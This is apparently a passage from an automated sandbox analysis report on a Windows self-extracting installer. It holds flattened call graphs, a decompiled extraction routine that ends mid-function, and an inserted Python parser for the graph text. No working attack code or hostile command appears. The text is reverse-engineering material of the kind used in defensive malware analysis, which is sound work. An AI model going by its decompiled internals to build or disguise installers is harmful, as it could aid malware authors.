1941a8 2817->2818 2819 194195 2817->2819 2821 19468f 7 API calls 2818->2821 2820 1944b9 20 API calls 2819->2820 2822 1941a6 2820->2822 2823 1941b5 2821->2823 2822->2444 2824 1941b9 2823->2824 2825 1941c5 lstrcmpA 2823->2825 2827 1944b9 20 API calls 2824->2827 2825->2824 2826 1941e6 LocalFree 2825->2826 2826->2822 2827->2826 2829 19171e _vsnprintf 2828->2829 2830 1962c9 FindResourceA 2829->2830 2832 1962cb LoadResource LockResource 2830->2832 2833 196353 2830->2833 2832->2833 2836 1962e0 2832->2836 2834 196ce0 4 API calls 2833->2834 2835 1951ca 2834->2835 2835->2672 2835->2673 2837 19631b FreeResource 2836->2837 2838 196355 FreeResource 2836->2838 2839 19171e _vsnprintf 2837->2839 2838->2833 2839->2830 2841 19548a 2840->2841 2859 19551a 2840->2859 2901 1953a1 2841->2901 2844 195581 2847 196ce0 4 API calls 2844->2847 2846 195495 2846->2844 2850 19550c 2846->2850 2851 1954c2 GetSystemInfo 2846->2851 2852 19559a 2847->2852 2848 19553b CreateDirectoryA 2853 195577 2848->2853 2854 195547 2848->2854 2849 19554d 2849->2844 2855 19597d 34 API calls 2849->2855 2856 19658a CharPrevA 2850->2856 2862 1954da 2851->2862 2852->2714 2864 192630 GetWindowsDirectoryA 2852->2864 2857 196285 GetLastError 2853->2857 2854->2849 2858 19555c 2855->2858 2856->2859 2860 19557c 2857->2860 2858->2844 2863 195568 RemoveDirectoryA 2858->2863 2912 1958c8 2859->2912 2860->2844 2861 19658a CharPrevA 2861->2850 2862->2850 2862->2861 2863->2844 2865 19266f 2864->2865 2866 19265e 2864->2866 2868 196ce0 4 API calls 2865->2868 2867 1944b9 20 API calls 2866->2867 2867->2865 2869 192687 2868->2869 2869->2705 2869->2715 2871 19696e GetDiskFreeSpaceA 2870->2871 2872 1969a1 2870->2872 2871->2872 2873 196989 MulDiv 2871->2873 2872->2724 2873->2872 2875 1959bb 2874->2875 2876 1959dd GetDiskFreeSpaceA 2874->2876 2877 1944b9 20 API calls 2875->2877 2878 195ba1 memset 2876->2878 2879 195a21 MulDiv 2876->2879 2880 1959cc 2877->2880 2881 196285 GetLastError 2878->2881 2879->2878 2882 195a50 GetVolumeInformationA 
2879->2882 2883 196285 GetLastError 2880->2883 2884 195bbc GetLastError FormatMessageA 2881->2884 2885 195a6e memset 2882->2885 2886 195ab5 SetCurrentDirectoryA 2882->2886 2887 1959d1 2883->2887 2888 195be3 2884->2888 2889 196285 GetLastError 2885->2889 2895 195acc 2886->2895 2899 195b94 2887->2899 2890 1944b9 20 API calls 2888->2890 2891 195a89 GetLastError FormatMessageA 2889->2891 2892 195bf5 SetCurrentDirectoryA 2890->2892 2891->2888 2892->2899 2893 196ce0 4 API calls 2894 195c11 2893->2894 2894->2705 2896 195b0a 2895->2896 2898 195b20 2895->2898 2897 1944b9 20 API calls 2896->2897 2897->2887 2898->2899 2924 19268b 2898->2924 2899->2893 2903 1953bf 2901->2903 2902 19171e _vsnprintf 2902->2903 2903->2902 2904 19658a CharPrevA 2903->2904 2907 195415 GetTempFileNameA 2903->2907 2905 1953fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 19544f CreateDirectoryA 2905->2906 2906->2907 2908 19543a 2906->2908 2907->2908 2909 195429 DeleteFileA CreateDirectoryA 2907->2909 2910 196ce0 4 API calls 2908->2910 2909->2908 2911 195449 2910->2911 2911->2846 2913 1958d8 2912->2913 2913->2913 2914 1958df LocalAlloc 2913->2914 2915 1958f3 2914->2915 2918 195919 2914->2918 2916 1944b9 20 API calls 2915->2916 2917 195906 2916->2917 2919 196285 GetLastError 2917->2919 2921 195534 2917->2921 2920 19658a CharPrevA 2918->2920 2919->2921 2922 195931 CreateFileA LocalFree 2920->2922 2921->2848 2921->2849 2922->2917 2923 19595b CloseHandle GetFileAttributesA 2922->2923 2923->2917 2925 1926b9 2924->2925 2926 1926e5 2924->2926 2927 19171e _vsnprintf 2925->2927 2928 1926ea 2926->2928 2929 19271f 2926->2929 2931 1926cc 2927->2931 2932 19171e _vsnprintf 2928->2932 2930 1926e3 2929->2930 2933 19171e _vsnprintf 2929->2933 2934 196ce0 4 API calls 2930->2934 2935 1944b9 20 API calls 2931->2935 2936 1926fd 2932->2936 2938 192735 2933->2938 2939 19276d 2934->2939 2935->2930 2937 1944b9 20 API calls 2936->2937 2937->2930 2940 1944b9 20 API calls 2938->2940 2939->2899 2940->2930 2942 
19468f 7 API calls 2941->2942 2943 194ff5 FindResourceA LoadResource LockResource 2942->2943 2944 195020 2943->2944 2959 19515f 2943->2959 2945 195029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2944->2945 2946 195057 2944->2946 2945->2946 2963 194efd 2946->2963 2949 19507c 2953 1950e8 2949->2953 2957 195106 2949->2957 2950 195060 2951 1944b9 20 API calls 2950->2951 2952 195075 2951->2952 2952->2957 2954 1944b9 20 API calls 2953->2954 2954->2952 2955 195110 FreeResource 2956 19511d 2955->2956 2958 195129 2956->2958 2960 19513a 2956->2960 2957->2955 2957->2956 2961 1944b9 20 API calls 2958->2961 2959->2743 2960->2959 2962 19514c SendMessageA 2960->2962 2961->2960 2962->2959 2964 194f4a 2963->2964 2965 194fa1 2964->2965 2966 194980 25 API calls 2964->2966 2967 196ce0 4 API calls 2965->2967 2969 194f67 2966->2969 2968 194fc6 2967->2968 2968->2949 2968->2950 2969->2965 2970 194b60 FindCloseChangeNotification 2969->2970 2970->2965 2972 19255b 2971->2972 2973 192510 2971->2973 2975 196ce0 4 API calls 2972->2975 2974 19658a CharPrevA 2973->2974 2976 192522 WritePrivateProfileStringA _lopen 2974->2976 2977 192569 2975->2977 2976->2972 2978 192548 _llseek _lclose 2976->2978 2977->2752 2978->2972 2980 191b25 2979->2980 3083 191a84 2980->3083 2982 191b57 2983 19658a CharPrevA 2982->2983 2984 191b8c 2982->2984 2983->2984 2985 1966c8 2 API calls 2984->2985 2986 191bd1 2985->2986 2987 191bd9 CompareStringA 2986->2987 2988 191d73 2986->2988 2987->2988 2989 191bf7 GetFileAttributesA 2987->2989 2990 1966c8 2 API calls 2988->2990 2991 191c0d 2989->2991 2992 191d53 2989->2992 2993 191d7d 2990->2993 2991->2992 2998 191a84 2 API calls 2991->2998 2997 1944b9 20 API calls 2992->2997 2994 191df8 LocalAlloc 2993->2994 2995 191d81 CompareStringA 2993->2995 2994->2992 2996 191e0b GetFileAttributesA 2994->2996 2995->2994 3003 191d9b 2995->3003 3006 191e1d 2996->3006 3013 191e45 2996->3013 3018 191cc2 2997->3018 2999 191c31 2998->2999 3001 191c50 LocalAlloc 2999->3001 3007 191a84 2 API calls 
2999->3007 3000 191e89 3002 196ce0 4 API calls 3000->3002 3001->2992 3004 191c67 GetPrivateProfileIntA GetPrivateProfileStringA 3001->3004 3005 191ea1 3002->3005 3003->3003 3008 191dbe LocalAlloc 3003->3008 3012 191cf8 3004->3012 3004->3018 3005->2771 3006->3013 3007->3001 3008->2992 3011 191de1 3008->3011 3016 19171e _vsnprintf 3011->3016 3014 191d09 GetShortPathNameA 3012->3014 3015 191d23 3012->3015 3089 192aac 3013->3089 3014->3015 3017 19171e _vsnprintf 3015->3017 3016->3018 3017->3018 3018->3000 3020 19209a 3019->3020 3021 192256 3019->3021 3023 19171e _vsnprintf 3020->3023 3026 1920dc 3020->3026 3022 196ce0 4 API calls 3021->3022 3024 192263 3022->3024 3025 1920af RegQueryValueExA 3023->3025 3024->2771 3025->3020 3025->3026 3027 1920fb GetSystemDirectoryA 3026->3027 3028 1920e4 RegCloseKey 3026->3028 3029 19658a CharPrevA 3027->3029 3028->3021 3030 19211b LoadLibraryA 3029->3030 3031 192179 GetModuleFileNameA 3030->3031 3032 19212e GetProcAddress FreeLibrary 3030->3032 3033 1921de RegCloseKey 3031->3033 3037 192177 3031->3037 3032->3031 3034 19214e GetSystemDirectoryA 3032->3034 3033->3021 3035 192165 3034->3035 3034->3037 3036 19658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 1921b7 LocalAlloc 3037->3038 3039 1921cd 3038->3039 3040 1921ec 3038->3040 3041 1944b9 20 API calls 3039->3041 3042 19171e _vsnprintf 3040->3042 3041->3033 3043 192218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3021 3046 194016 CreateProcessA 3045->3046 3057 194106 3045->3057 3047 194041 WaitForSingleObject GetExitCodeProcess 3046->3047 3048 1940c4 3046->3048 3055 194070 3047->3055 3050 196285 GetLastError 3048->3050 3049 196ce0 4 API calls 3051 194117 3049->3051 3052 1940c9 GetLastError FormatMessageA 3050->3052 3051->2771 3054 1944b9 20 API calls 3052->3054 3054->3057 3116 19411b 3055->3116 3056 194096 CloseHandle CloseHandle 3056->3057 3058 1940ba 3056->3058 3057->3049 3058->3057 3060 1964c2 3059->3060 3061 19658a CharPrevA 3060->3061 3062 1964d8 GetFileAttributesA 
3061->3062 3063 1964ea 3062->3063 3064 196501 LoadLibraryA 3062->3064 3063->3064 3065 1964ee LoadLibraryExA 3063->3065 3066 196508 3064->3066 3065->3066 3067 196ce0 4 API calls 3066->3067 3068 196513 3067->3068 3068->2791 3070 192289 RegOpenKeyExA 3069->3070 3071 192381 3069->3071 3070->3071 3073 1922b1 RegQueryValueExA 3070->3073 3072 196ce0 4 API calls 3071->3072 3074 19238c 3072->3074 3075 192374 RegCloseKey 3073->3075 3076 1922e6 memset GetSystemDirectoryA 3073->3076 3074->2764 3075->3071 3077 19230f 3076->3077 3078 192321 3076->3078 3079 19658a CharPrevA 3077->3079 3080 19171e _vsnprintf 3078->3080 3079->3078 3081 19233f RegSetValueExA 3080->3081 3081->3075 3085 191a9a 3083->3085 3086 191aba 3085->3086 3088 191aaf 3085->3088 3102 19667f 3085->3102 3086->2982 3087 19667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 192be6 3089->3090 3091 192ad4 GetModuleFileNameA 3089->3091 3092 196ce0 4 API calls 3090->3092 3101 192b02 3091->3101 3094 192bf5 3092->3094 3093 192af1 IsDBCSLeadByte 3093->3101 3094->3000 3095 192bca CharNextA 3097 192bd3 CharNextA 3095->3097 3096 192b11 CharNextA CharUpperA 3098 192b8d CharUpperA 3096->3098 3096->3101 3097->3101 3098->3101 3100 192b43 CharPrevA 3100->3101 3101->3090 3101->3093 3101->3095 3101->3096 3101->3097 3101->3100 3107 1965e8 3101->3107 3103 196689 3102->3103 3104 1966a5 3103->3104 3105 196648 IsDBCSLeadByte 3103->3105 3106 196697 CharNextA 3103->3106 3104->3085 3105->3103 3106->3103 3108 1965f4 3107->3108 3108->3108 3109 1965fb CharPrevA 3108->3109 3110 196611 CharPrevA 3109->3110 3111 19660b 3110->3111 3112 19661e 3110->3112 3111->3110 3111->3112 3113 196634 CharNextA 3112->3113 3114 196627 CharPrevA 3112->3114 3115 19663d 3112->3115 3113->3115 3114->3113 3114->3115 3115->3101 3117 194132 3116->3117 3119 19412a 3116->3119 3120 191ea7 3117->3120 3119->3056 3121 191eba 3120->3121 3123 191ed3 3120->3123 3122 19256d 15 API calls 3121->3122 3122->3123 3123->3119 3125 191ff0 RegOpenKeyExA 3124->3125 3126 192026 3124->3126 
3125->3126 3127 19200f RegDeleteValueA RegCloseKey 3125->3127 3126->2479 3127->3126 3276 196a20 __getmainargs 3277 1919e0 3278 191a03 3277->3278 3279 191a24 GetDesktopWindow 3277->3279 3280 191a20 3278->3280 3282 191a16 EndDialog 3278->3282 3281 1943d0 11 API calls 3279->3281 3284 196ce0 4 API calls 3280->3284 3283 191a33 LoadStringA SetDlgItemTextA MessageBeep 3281->3283 3282->3280 3283->3280 3285 191a7e 3284->3285

Callgraph

                                                                                                                                                                                                                                    callgraph 0 Function_0019411B 84 Function_00191EA7 0->84 1 Function_00192F1D 4 Function_0019621E 1->4 16 Function_00193A3F 1->16 25 Function_00193B26 1->25 40 Function_00194169 1->40 41 Function_0019256D 1->41 47 Function_00195164 1->47 59 Function_0019658A 1->59 66 Function_00196285 1->66 68 Function_001944B9 1->68 78 Function_001955A0 1->78 81 Function_00193BA2 1->81 115 Function_00196CE0 1->115 119 Function_001951E5 1->119 2 Function_0019681F 96 Function_001966F9 2->96 2->115 3 Function_0019171E 35 Function_0019597D 4->35 4->66 4->68 4->115 5 Function_00193210 24 Function_00194224 5->24 5->35 5->59 5->68 87 Function_001943D0 5->87 89 Function_001958C8 5->89 6 Function_00197010 7 Function_00195C17 8 Function_00196517 8->68 9 Function_00197208 10 Function_0019490C 11 Function_00197000 12 Function_00194200 13 Function_00193100 13->87 14 Function_00196C03 32 Function_0019724D 14->32 15 Function_00194702 63 Function_00191680 15->63 71 Function_001916B3 15->71 16->8 60 Function_0019468F 16->60 16->66 16->68 17 Function_00196C3F 18 Function_00192630 18->68 18->115 19 Function_00194C37 20 Function_00196E2A 100 Function_00196CF0 20->100 21 Function_0019202A 21->3 21->59 21->68 21->115 22 Function_00197120 23 Function_00196A20 24->63 24->68 25->8 51 Function_00196298 25->51 113 Function_00194FE0 25->113 26 Function_00194A50 27 Function_00193450 27->87 28 Function_00196952 29 Function_00197155 30 Function_00196F54 30->9 30->32 31 Function_00196648 33 Function_00196F40 34 Function_0019487A 34->10 58 Function_0019268B 35->58 35->66 35->68 35->115 36 Function_0019667F 36->31 37 Function_00197270 38 Function_00196C70 39 Function_00192773 39->59 61 Function_00191781 39->61 39->63 39->115 40->60 40->68 114 Function_001924E0 41->114 42 Function_0019476D 
42->8 75 Function_001966AE 42->75 43 Function_00194B60 44 Function_00196A60 44->9 44->17 44->29 44->32 45 Function_00197060 44->45 97 Function_00192BFB 44->97 45->6 45->22 46 Function_00196760 47->51 47->60 47->68 48 Function_00195467 48->35 48->59 48->61 48->63 48->66 76 Function_001953A1 48->76 48->89 48->115 49 Function_00192267 49->3 49->59 49->115 50 Function_00194E99 50->63 51->3 51->115 52 Function_00195C9E 52->7 52->20 52->36 52->59 52->63 52->68 90 Function_001966C8 52->90 52->115 116 Function_001931E0 52->116 53 Function_00192390 53->53 53->59 53->63 53->71 53->115 54 Function_00191F90 54->68 54->84 54->115 55 Function_00196793 56 Function_00196495 56->59 56->61 56->115 57 Function_00192A89 58->3 58->68 58->115 59->71 62 Function_00194980 62->34 62->68 63->61 64 Function_00193680 65 Function_00196380 67 Function_00191A84 67->36 68->2 68->3 68->63 88 Function_001967C9 68->88 68->115 69 Function_00196FBE 69->30 70 Function_001969B0 70->11 70->38 70->69 108 Function_001971EF 70->108 71->61 72 Function_001952B6 72->53 72->61 105 Function_001965E8 72->105 112 Function_00191FE1 72->112 72->115 73 Function_00192CAA 73->8 73->52 73->53 73->60 73->68 80 Function_001918A3 73->80 110 Function_001936EE 73->110 73->115 74 Function_00192AAC 74->63 91 Function_001917C8 74->91 74->105 74->115 76->3 76->59 76->63 76->115 77 Function_00196FA1 78->8 78->18 78->28 78->35 78->48 78->59 78->60 78->61 78->66 78->68 78->115 79 Function_00194CA0 111 Function_001917EE 80->111 80->115 81->21 81->49 81->56 81->60 81->61 81->66 81->68 103 Function_00191AE8 81->103 107 Function_00193FEF 81->107 81->115 82 Function_001972A2 83 Function_00196FA5 83->32 84->41 85 Function_00194AD0 85->64 86 Function_00194CD0 86->15 86->19 86->42 86->43 86->50 86->62 86->115 117 Function_001947E0 86->117 87->115 88->55 89->59 89->63 89->66 89->68 90->31 92 Function_00194CC0 93 Function_00194BC0 94 Function_001930C0 95 Function_001963C0 95->59 95->61 95->115 97->1 97->54 97->72 97->73 98 Function_00194EFD 
98->43 98->62 98->115 99 Function_001970FE 101 Function_001934F0 101->64 101->68 101->87 102 Function_00196EF0 103->3 103->59 103->61 103->63 103->67 103->68 103->71 103->74 103->90 103->115 104 Function_001928E8 104->39 104->57 106 Function_001970EB 107->0 107->66 107->68 107->115 109 Function_00196BEF 110->2 110->57 110->68 110->88 110->104 110->115 111->115 113->60 113->68 113->98 114->59 114->115 115->100 117->63 117->68 118 Function_001919E0 118->87 118->115 119->60 119->66 119->68
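The function graphs and the callgraph above are the report's interactive graph widgets flattened to text: each node is a decimal id followed by an address (or a Function_XXXXXXXX name), optionally the imported APIs the block calls or "N API calls" where the viewer folded a callee, and each edge is "id->id". The following parser, added here as a worked example (it is not Joe Sandbox code and not part of the original report), recovers that structure and answers the question an analyst actually asks of such a graph: which Win32 APIs are reachable from a function's entry. The two sample strings are excerpts copied from the graphs above (the ReadFile/memcpy graph at 194a50 and the ExitWindowsEx graph at 191f90); the privilege-then-action triage pattern is an assumption chosen for this illustration, not a rule the report applies.

```python
"""Parse a Joe Sandbox function-graph / callgraph edge list that was flattened to text.

Node syntax:  <id> <addr> [label ...]      e.g.  2495 191ee2 GetCurrentProcess OpenProcessToken
              <id> <addr> N API calls      a callee whose N API calls the viewer folded into one node
              <id> <addr> call <addr>      internal call, as shown in control-flow-graph blocks
Edge syntax:  <id>-><id>
<addr> is a hex address, a basic-block range (193ba2-193bd9) or Function_XXXXXXXX.
"""
import re
from collections import deque

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^(?:[0-9a-f]{5,8}(?:-[0-9a-f]{5,8})?|Function_[0-9A-Fa-f]{8})$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Constructed samples: excerpts copied from the function graphs in this report.
SAMPLE_READ = (
    "3186 194a50 3187 194a9f ReadFile 3186->3187 3188 194a66 3186->3188 "
    "3190 194abb 3187->3190 3189 194a82 memcpy 3188->3189 3188->3190 3189->3190"
)
SAMPLE_SHUTDOWN = (
    "2489 191f90 2490 191f9a 2489->2490 2491 191f9f 2489->2491 2492 191ea7 15 API calls "
    "2490->2492 2493 191fc0 2491->2493 2494 1944b9 20 API calls 2491->2494 2497 191fd9 "
    "2491->2497 2492->2491 2495 191ee2 GetCurrentProcess OpenProcessToken 2493->2495 "
    "2496 191fcf ExitWindowsEx 2493->2496 2493->2497 2494->2493 2499 191f23 "
    "LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2502 191f0e "
    "2495->2502 2496->2497 2497->2384 2500 191f6b ExitWindowsEx 2499->2500 2499->2502 "
    "2501 191f1f 2500->2501 2500->2502 2504 196ce0 4 API calls 2501->2504 2503 1944b9 "
    "20 API calls 2502->2503 2503->2501 2505 191f8c 2504->2505 2505->2384"
)


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> {addr, apis, calls, folded}, edges id -> [ids]."""
    nodes, edges, cur = {}, {}, None
    tokens = text.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.setdefault(m.group(1), []).append(m.group(2))
            i += 1
            continue
        # A node starts with a decimal id followed by an address-like token.
        if NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = tok
            nodes[cur] = {"addr": tokens[i + 1], "apis": [], "calls": [], "folded": 0}
            i += 2
            continue
        if cur is None:  # tokens before the first node, e.g. the graph's name
            i += 1
            continue
        # "N API calls": the viewer folded a callee's N API calls into this node.
        if NODE_ID.match(tok) and tokens[i + 1:i + 3] == ["API", "calls"]:
            nodes[cur]["folded"] += int(tok)
            i += 3
            continue
        # "call <addr>": internal call recorded in control-flow-graph blocks.
        if tok == "call" and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            nodes[cur]["calls"].append(tokens[i + 1])
            i += 2
            continue
        nodes[cur]["apis"].append(tok)  # anything else is an imported API name
        i += 1
    return nodes, edges


def reachable(nodes, edges, start):
    """BFS from `start`; return (set of APIs, number of folded API calls) over reached nodes.

    Edges into nodes missing from the excerpt are tolerated: the report cuts graphs per
    function, so dangling edges such as 2497->2384 are normal.
    """
    seen, queue, apis, folded = {start}, deque([start]), set(), 0
    while queue:
        n = queue.popleft()
        info = nodes.get(n)
        if info:
            apis.update(info["apis"])
            folded += info["folded"]
        for nxt in edges.get(n, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return apis, folded


# Assumed triage pattern for this example: a privilege is acquired and then used.
PRIVILEGE_APIS = {"LookupPrivilegeValueA", "AdjustTokenPrivileges"}
ACTION_APIS = {"ExitWindowsEx"}


def flags_privilege_then_action(apis):
    """True when a reachable API set contains both the privilege step and the action."""
    return bool(apis & PRIVILEGE_APIS) and bool(apis & ACTION_APIS)


def entry_node(nodes):
    """The first node in parse order is the graph's entry (the function start)."""
    return next(iter(nodes))


if __name__ == "__main__":
    for name, text in (("194a50", SAMPLE_READ), ("191f90", SAMPLE_SHUTDOWN)):
        nodes, edges = parse_graph(text)
        apis, folded = reachable(nodes, edges, entry_node(nodes))
        print(f"{name}: {sorted(apis)} (+{folded} folded calls) "
              f"flagged={flags_privilege_then_action(apis)}")
```

Running the script over the 191f90 excerpt reports GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, CloseHandle and ExitWindowsEx, plus 59 folded API calls hidden behind the "N API calls" nodes, which is why a quick scan of the visible labels undercounts what a function can reach. The same parser accepts the control-flow-graph form ("36 193ba2-193bd9 37 193bdb-193bee call 19468f 36->37"), recording internal calls separately from imported APIs.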

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
C-Code - Quality: 82%
E00193BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	_t164 = (_t162 & 0xfffffff8) - 0x194;
	_t69 =  *0x198004; // 0x21bd9a3c
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0x199124 =  *0x199124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0x198a28 - _t153; // 0x0
	if(_t165 != 0) {
		L3:
		_t127 = 0;
		_v392 = 0;
		while(1) {
			_v400 = _v400 & 0x00000000;
			memset( &_v348, 0, 0x44);
			_t164 = _t164 + 0xc;
			_v348 = 0x44;
			if( *0x198c42 != 0) {
				goto L26;
			}
			_t146 =  &_v396;
			_t115 = E0019468F("SHOWWINDOW",  &_v396, 4);
			if(_t115 == 0 || _t115 > 4) {
				L25:
				_t146 = 0x4b1;
				E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
				 *0x199124 = 0x80070714;
				goto L62;
			} else {
				if(_v396 != 1) {
					__eflags = _v396 - 2;
					if(_v396 != 2) {
						_t137 = 3;
						__eflags = _v396 - _t137;
						if(_v396 == _t137) {
							_v304 = 1;
							_v300 = _t137;
						}
						goto L14;
					}
					_push(6);
					_v304 = 1;
					_pop(0);
					goto L11;
				} else {
					_v304 = 1;
					L11:
					_v300 = 0;
					L14:
					if(_t127 != 0) {
						L27:
						_t155 = 1;
						__eflags = _t127 - 1;
						if(_t127 != 1) {
							L31:
							_t132 =  &_v280;
							_t76 = E00191AE8( &_v280,  &_v408,  &_v404); // executed
							__eflags = _t76;
							if(_t76 == 0) {
								L62:
								_t77 = 0;
                                                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                                                    											return E00196CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                                                    												_t79 = E00193FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                                                    													__eflags =  *0x198580;
                                                                                                                                                                                                                                    													if( *0x198580 != 0) {
                                                                                                                                                                                                                                    														E00192267();
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                                                    											__eflags =  *0x198180;
                                                                                                                                                                                                                                    											if( *0x198180 == 0) {
                                                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                                                    												E001944B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                                                    												 *0x199124 = 0x8007042b;
                                                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags =  *0x199a34 & 0x00000004;
                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t129 = E00196495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                                                    												E001944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                                                    												 *0x199124 = E00196285();
                                                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                                                    												E001944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags =  *0x198a30;
                                                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                                                    											_v368 =  &_v280;
                                                                                                                                                                                                                                    											_t96 =  *0x199a40; // 0x3
                                                                                                                                                                                                                                    											_v364 = _t96;
                                                                                                                                                                                                                                    											_t97 =  *0x198a38 & 0x0000ffff;
                                                                                                                                                                                                                                    											_v380 = 0x199154;
                                                                                                                                                                                                                                    											_v376 = _t151;
                                                                                                                                                                                                                                    											_v372 = 0x1991e4;
                                                                                                                                                                                                                                    											_v360 = _t97;
                                                                                                                                                                                                                                    											if( *0x198a30 != 0) {
                                                                                                                                                                                                                                    												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t144 =  *0x199a34; // 0x1
                                                                                                                                                                                                                                    											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                    											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                    												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                    											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                    												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                                                    											}
											_t145 =  *0x198d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
